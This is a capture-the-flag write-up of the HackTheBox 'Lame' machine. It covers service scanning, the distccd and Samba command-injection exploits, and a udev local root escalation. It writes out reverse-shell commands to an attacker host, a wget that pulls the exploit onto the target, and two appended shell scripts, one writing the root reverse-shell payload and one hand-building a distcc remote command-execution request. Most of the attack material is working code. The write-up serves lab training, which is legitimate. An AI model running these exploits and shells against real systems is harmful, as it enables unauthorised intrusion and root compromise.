HackTheBox - Lame write-up


This is an Easy box from HTB Labs. Lame runs several vulnerable network services, any of which gives you a foothold on the system. Let's start cracking!

Nmap Scanning Results

sudo nmap -sV -A <target>

| PORT | STATE | SERVICE | VERSION |
|------|-------|---------|---------|
| 21/tcp | open | ftp | vsftpd 2.3.4 |
| 22/tcp | open | ssh | OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) |
| 139/tcp | open | netbios-ssn | Samba smbd 3.X - 4.X (workgroup: WORKGROUP) |
| 445/tcp | open | netbios-ssn | Samba smbd 3.0.20-Debian (workgroup: WORKGROUP) |
| 3632/tcp | open | distccd | distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) |

Script results per port:

    21/tcp  ftp-anon: Anonymous FTP login allowed (FTP code 230)
    22/tcp  ssh-hostkey:
              1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
              2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)

Host script results:

    smb-os-discovery:
      OS: Unix (Samba 3.0.20-Debian)
      NetBIOS computer name:
      Workgroup: WORKGROUP\x00

Exploit Searching

So distccd (protocol v1, built with GCC 4.2.4) and Samba 3.0.20 are running on the remote machine. A quick search on Metasploit and Google shows that both services are vulnerable and have public exploits: Samba 3.0.20 is affected by the "username map script" command injection (CVE-2007-2447, Metasploit module exploit/multi/samba/usermap_script), which hands you a root shell directly because smbd runs as root, and distccd executes whatever command an unauthenticated client sends it as a "compiler" (CVE-2004-2687, Metasploit module exploit/unix/misc/distcc_exec).

URL: https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script

Exploitation (with Metasploit)



I was curious about distccd from the start and wanted to dig into it. A distccd module is also available in Metasploit (exploit/unix/misc/distcc_exec), so let's exploit that one. It worked, but we got a limited shell: distccd runs as the daemon user, so we land as daemon rather than as root or a normal user. Let's find a way to escalate privileges.

Privilege Escalation

Run `uname -a` to find the kernel and OS version running on the machine. The remote host reports Linux 2.6.24-16-server, the Ubuntu 8.04 kernel, and the udev that ships with that release is vulnerable to a local privilege escalation (CVE-2009-1185, Exploit-DB 8572): udevd accepts netlink messages from unprivileged userspace, and the exploit abuses that to make udevd execute /tmp/run as root.

Now get the exploit onto the target:

1. On the attacking machine, download the exploit (`wget http://www.exploit-db.com/download/8572`), move 8572.c to /var/www/html, make it world-readable, and start the Apache web server: `service apache2 start`.
2. On the target, fetch it into /tmp (`cd /tmp && wget http://<attacker ip>/8572.c`) and compile it: `gcc 8572.c -o exploit`.
3. The exploit makes udevd execute the file /tmp/run, so create it with a reverse shell back to the attacking machine:

    echo '#!/bin/bash' > run
    echo '/bin/netcat -e /bin/bash <attacker ip> 1234' >> run

Then find the PID that udevd's netlink socket is registered under: `cat /proc/net/netlink` and take the Pid column of the entry that is not 0 (the kernel's own sockets show Pid 0). Start a listener on the attacking machine (`nc -lvnp 1234`) and run the exploit with that PID: `./exploit <pid>`. udevd runs /tmp/run as root and the listener receives a root shell. Got r00t!
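The step people get wrong here is which PID to pass: 8572 wants the PID shown in the Pid column of /proc/net/netlink for udevd's socket, which is commonly udevd's PID minus one, not the number `ps` prints. The following shell helpers are an added example, not part of the original write-up or of the exploit itself: they pick that PID out of a (constructed) /proc/net/netlink listing and write the /tmp/run payload. The attacker IP is an assumption; port 1234 is the one the write-up uses.

```shell
#!/bin/sh
# Added example: helpers for the udev (CVE-2009-1185 / Exploit-DB 8572) step.
# The exploit needs the PID udevd's netlink socket is registered under, which
# is the Pid column in /proc/net/netlink. Kernel-owned netlink sockets list
# Pid 0 and are skipped; udevd listens on protocol 15 (NETLINK_KOBJECT_UEVENT),
# the Eth column.

# Print the PID of the first user-space NETLINK_KOBJECT_UEVENT socket.
# Argument: path to a netlink listing (defaults to the live /proc file).
udev_netlink_pid() {
    awk 'NR > 1 && $2 == 15 && $3 != 0 { print $3; exit }' "${1:-/proc/net/netlink}"
}

# Write the payload that 8572 makes udevd run as root: a reverse shell back
# to the attacking machine. Arguments: path, attacker IP, attacker port.
write_run_file() {
    printf '#!/bin/bash\n/bin/netcat -e /bin/bash %s %s\n' "$2" "$3" > "$1"
    chmod +x "$1"
}

# Constructed /proc/net/netlink contents for testing (not captured from the
# box): a kernel socket on protocol 0, a kernel uevent socket, then udevd's.
SAMPLE_NETLINK='sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
df9c8000 0   0      00000000 0        0        00000000 2
df2b1000 15  0      00000000 0        0        00000000 2
df2b0c00 15  2663   00000001 0        0        00000000 2'

# Full sequence on the target once 8572.c is in /tmp and a listener
# (nc -lvnp 1234) is up on the attacking machine; ATTACKER_IP is assumed:
#   gcc 8572.c -o exploit
#   write_run_file /tmp/run "$ATTACKER_IP" 1234
#   ./exploit "$(udev_netlink_pid)"
```

Against the sample listing `udev_netlink_pid` returns 2663, the third row: the first row is not a uevent socket and the second belongs to the kernel.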

Exploitation (without Metasploit)

The distcc bug can also be driven from nmap alone. As a test, run the distcc NSE script with `id` as the payload:

    nmap -p 3632 --script distcc-cve2004-2687.nse --script-args="distcc-cve2004-2687.cmd='id'" <target>

It returns the uid and gid of the daemon user, so the script works and the service really does run whatever command it is sent. Now use the same script to spawn a reverse shell to a listener on the attacking machine:

    nmap -p 3632 --script distcc-cve2004-2687.nse --script-args="distcc-cve2004-2687.cmd='nc -e /bin/sh <attacker ip> 1234'" <target>

That shell is still the daemon user, so repeat the udev privilege escalation above to get root, then grab the flags. This was an easy box; the privilege escalation was the interesting bit.
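To see what that NSE script actually puts on the wire, here is an added shell example (not from the original write-up and not nmap's code) that builds the distcc v1 compile request whose "compiler" is `sh -c <cmd>`, and pulls the command's exit status and stdout back out of the server's reply. The target address in the usage comment is an assumption, and the sample reply is constructed rather than captured from the box.

```shell
#!/bin/sh
# Added example: hand-rolled distcc v1 request for CVE-2004-2687 and a parser
# for the reply. Every distcc token is a 4-byte tag followed by 8 hex digits
# (a length or a value) and, for ARGV/DOTI/SERR/SOUT/DOTO, that many bytes.
export LC_ALL=C   # ${#var} must count bytes, not characters

# ARGV token: tag, 8-hex-digit length, raw bytes.
distcc_arg() {
    printf 'ARGV%08x%s' "${#1}" "$1"
}

# Build the request the distcc-cve2004-2687 script sends: DIST (protocol
# version 1), ARGC (8 argv entries), the argv tokens, and a one-byte DOTI
# ("preprocessed source"). distccd execs argv[0] as the compiler, so
# "sh -c CMD" runs CMD; the "#" argument is only there so the trailing
# "-c main.c -o main.o", which makes the argv look like a compile line, is
# harmless to sh.
distcc_request() {
    printf 'DIST%08xARGC%08x' 1 8
    for a in sh -c "$1" '#' -c main.c -o main.o; do
        distcc_arg "$a"
    done
    printf 'DOTI%08x%s' 1 A
}

# The 8 hex digits that follow TAG ($2) in reply $1.
distcc_field() {
    printf '%s' "${1#*$2}" | dd bs=1 count=8 2>/dev/null
}

# Exit status of the command, from the STAT token.
distcc_status() {
    echo $((0x$(distcc_field "$1" STAT)))
}

# Body of the SOUT (stdout) token: 8-hex byte count, then that many bytes.
# Assumes the SERR body does not itself contain the text "SOUT".
distcc_stdout() {
    rest=${1#*SOUT}
    n=$((0x$(printf '%s' "$rest" | dd bs=1 count=8 2>/dev/null)))
    [ "$n" -gt 0 ] || return 0
    printf '%s' "$rest" | dd bs=1 skip=8 count="$n" 2>/dev/null
}

# Constructed reply (not captured from the box): distccd answers with DONE,
# STAT (exit status), SERR and SOUT (stderr/stdout of the command), and DOTO
# (the "object file", empty here). 0x2c = 44 bytes of stdout.
SAMPLE_REPLY='DONE00000001STAT00000000SERR00000000SOUT0000002cuid=1(daemon) gid=1(daemon) groups=1(daemon)DOTO00000000'

# Usage against the box (TARGET is an assumption; 3632 is from the scan;
# OpenBSD nc keeps reading after stdin closes, other nc variants may need -q):
#   reply=$(distcc_request 'id' | nc -w 5 "$TARGET" 3632)
#   distcc_status "$reply"; distcc_stdout "$reply"
```

Run against `SAMPLE_REPLY`, `distcc_status` returns 0 and `distcc_stdout` returns the daemon user's `id` line, which is exactly the daemon-level access the Metasploit module and the NSE script give you before the udev escalation.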